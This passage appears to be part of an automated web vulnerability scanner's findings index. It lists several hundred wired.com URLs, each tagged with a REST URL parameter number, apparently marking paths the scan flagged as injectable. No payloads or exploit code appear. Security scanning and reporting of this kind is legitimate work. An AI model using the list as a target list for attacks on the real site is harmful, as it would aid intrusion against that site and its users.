1.340. http://www.wired.com/science/space [REST URL parameter 2]

1.341. http://www.wired.com/search [REST URL parameter 1]

1.342. http://www.wired.com/services/corrections/ [REST URL parameter 1]

1.343. http://www.wired.com/services/corrections/ [REST URL parameter 2]

1.344. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

1.345. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

1.346. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.347. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.348. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 4]

1.349. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 5]

1.350. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 6]

1.351. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 7]

1.352. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 8]

1.353. http://www.wired.com/services/faq/ [REST URL parameter 1]

1.354. http://www.wired.com/services/faq/ [REST URL parameter 2]

1.355. http://www.wired.com/services/feedback/general [REST URL parameter 1]

1.356. http://www.wired.com/services/feedback/general [REST URL parameter 2]

1.357. http://www.wired.com/services/feedback/general [REST URL parameter 3]

1.358. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 1]

1.359. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 2]

1.360. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 3]

1.361. http://www.wired.com/services/newsletters [REST URL parameter 1]

1.362. http://www.wired.com/services/newsletters [REST URL parameter 2]

1.363. http://www.wired.com/services/press/ [REST URL parameter 1]

1.364. http://www.wired.com/services/press/ [REST URL parameter 2]

1.365. http://www.wired.com/services/privacy/ [REST URL parameter 1]

1.366. http://www.wired.com/services/privacy/ [REST URL parameter 2]

1.367. http://www.wired.com/services/rss/ [REST URL parameter 1]

1.368. http://www.wired.com/services/rss/ [REST URL parameter 2]

1.369. http://www.wired.com/services/sitemap/ [REST URL parameter 1]

1.370. http://www.wired.com/services/sitemap/ [REST URL parameter 2]

1.371. http://www.wired.com/services/staff/ [REST URL parameter 1]

1.372. http://www.wired.com/services/staff/ [REST URL parameter 2]

1.373. http://www.wired.com/services/useragreement/ [REST URL parameter 1]

1.374. http://www.wired.com/services/useragreement/ [REST URL parameter 2]

1.375. http://www.wired.com/software [REST URL parameter 1]

1.376. http://www.wired.com/software/ [REST URL parameter 1]

1.377. http://www.wired.com/software/coolapps [REST URL parameter 1]

1.378. http://www.wired.com/software/coolapps [REST URL parameter 2]

1.379. http://www.wired.com/software/softwarereviews [REST URL parameter 1]

1.380. http://www.wired.com/software/softwarereviews [REST URL parameter 2]

1.381. http://www.wired.com/software/webservices [REST URL parameter 1]

1.382. http://www.wired.com/software/webservices [REST URL parameter 2]

1.383. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 1]

1.384. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

1.385. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

1.386. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

1.387. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

1.388. http://www.wired.com/support/feedback.html [REST URL parameter 1]

1.389. http://www.wired.com/support/feedback.html [REST URL parameter 1]

1.390. http://www.wired.com/support/feedback.html [REST URL parameter 2]

1.391. http://www.wired.com/support/feedback.html [REST URL parameter 2]

1.392. http://www.wired.com/techbiz [REST URL parameter 1]

1.393. http://www.wired.com/techbiz/ [REST URL parameter 1]

1.394. http://www.wired.com/techbiz/it [REST URL parameter 1]

1.395. http://www.wired.com/techbiz/it [REST URL parameter 2]

1.396. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 1]

1.397. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 2]

1.398. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 3]

1.399. http://www.wired.com/techbiz/media [REST URL parameter 1]

1.400. http://www.wired.com/techbiz/media [REST URL parameter 2]

1.401. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 1]

1.402. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 2]

1.403. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 3]

1.404. http://www.wired.com/techbiz/people [REST URL parameter 1]

1.405. http://www.wired.com/techbiz/people [REST URL parameter 2]

1.406. http://www.wired.com/techbiz/startups [REST URL parameter 1]

1.407. http://www.wired.com/techbiz/startups [REST URL parameter 2]

1.408. http://www.wired.com/user/login [REST URL parameter 1]

1.409. http://www.wired.com/user/login [REST URL parameter 2]

1.410. http://www.wired.com/user/logout [REST URL parameter 1]

1.411. http://www.wired.com/user/logout [REST URL parameter 2]

1.412. http://www.wired.com/user/registration [REST URL parameter 1]

1.413. http://www.wired.com/user/registration [REST URL parameter 2]

1.414. http://www.wired.com/video [REST URL parameter 1]

1.415. http://www.wired.com/video/ [REST URL parameter 1]

1.416. http://www.wired.com/video/alt-text [REST URL parameter 1]

1.417. http://www.wired.com/video/alt-text [REST URL parameter 1]

1.418. http://www.wired.com/video/alt-text [REST URL parameter 2]

1.419. http://www.wired.com/video/alt-text [REST URL parameter 2]

1.420. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

1.421. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

1.422. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

1.423. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

1.424. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

1.425. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

1.426. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

1.427. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

1.428. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

1.429. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

1.430. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

1.431. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

1.432. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

1.433. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

1.434. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

1.435. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

1.436. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

1.437. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

1.438. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.439. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.440. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.441. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.442. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.443. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.444. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.445. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.446. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.447. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.448. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.449. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.450. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

1.451. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

1.452. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

1.453. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

1.454. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

1.455. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

1.456. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

1.457. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

1.458. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

1.459. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

1.460. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

1.461. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

1.462. http://www.wired.com/video/culture [REST URL parameter 1]

1.463. http://www.wired.com/video/culture [REST URL parameter 2]

1.464. http://www.wired.com/video/culture [REST URL parameter 2]

1.465. http://www.wired.com/video/events [REST URL parameter 1]

1.466. http://www.wired.com/video/events [REST URL parameter 2]

1.467. http://www.wired.com/video/events [REST URL parameter 2]

1.468. http://www.wired.com/video/gadgets [REST URL parameter 1]

1.469. http://www.wired.com/video/gadgets [REST URL parameter 2]

1.470. http://www.wired.com/video/gadgets [REST URL parameter 2]

1.471. http://www.wired.com/video/gaming [REST URL parameter 1]

1.472. http://www.wired.com/video/gaming [REST URL parameter 2]

1.473. http://www.wired.com/video/gaming [REST URL parameter 2]

1.474. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

1.475. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

1.476. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

1.477. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

1.478. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

1.479. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

1.480. http://www.wired.com/video/howto [REST URL parameter 1]

1.481. http://www.wired.com/video/howto [REST URL parameter 2]

1.482. http://www.wired.com/video/howto [REST URL parameter 2]

1.483. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

1.484. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

1.485. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

1.486. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

1.487. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

1.488. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

1.489. http://www.wired.com/video/interviews [REST URL parameter 1]

1.490. http://www.wired.com/video/interviews [REST URL parameter 2]

1.491. http://www.wired.com/video/interviews [REST URL parameter 2]

1.492. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

1.493. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

1.494. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

1.495. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

1.496. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

1.497. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

1.498. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 4]

1.499. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 5]

1.500. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 6]

1.501. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

1.502. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

1.503. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

1.504. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

1.505. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

1.506. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

1.507. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 4]

1.508. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 5]

1.509. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 6]

1.510. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.511. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.512. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.513. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.514. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.515. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.516. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

1.517. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

1.518. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

1.519. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.520. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.521. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.522. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.523. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.524. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.525. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 4]

1.526. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 5]

1.527. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 6]

1.528. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.529. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.530. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.531. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.532. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.533. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.534. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 4]

1.535. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 5]

1.536. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 6]

1.537. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.538. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.539. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.540. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.541. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.542. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.543. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 4]

1.544. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 5]

1.545. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 6]

1.546. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.547. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.548. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.549. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.550. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.551. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.552. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 4]

1.553. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 5]

1.554. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 6]

1.555. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.556. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.557. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.558. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.559. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.560. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.561. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 4]

1.562. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 5]

1.563. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 6]

1.564. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.565. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.566. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.567. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.568. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.569. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.570. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 4]

1.571. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 5]

1.572. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 6]

1.573. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

1.574. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

1.575. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

1.576. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

1.577. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

1.578. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

1.579. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 4]

1.580. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 5]

1.581. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 6]

1.582. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

1.583. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

1.584. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

1.585. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

1.586. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

1.587. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

1.588. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 4]

1.589. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 5]

1.590. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 6]

1.591. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

1.592. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

1.593. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.594. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.595. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.596. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.597. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

1.598. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

1.599. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

1.600. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 1]

1.601. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 1]

1.602. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 2]

1.603. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 2]

1.604. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 3]

1.605. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 3]

1.606. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 4]

1.607. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 5]

1.608. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 6]

1.609. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 1]

1.610. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 1]

1.611. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 2]

1.612. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 2]

1.613. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 3]

1.614. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 3]

1.615. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 4]

1.616. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 5]

1.617. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 6]

1.618. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.619. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.620. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.621. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.622. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.623. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.624. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

1.625. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

1.626. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

1.627. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.628. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.629. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

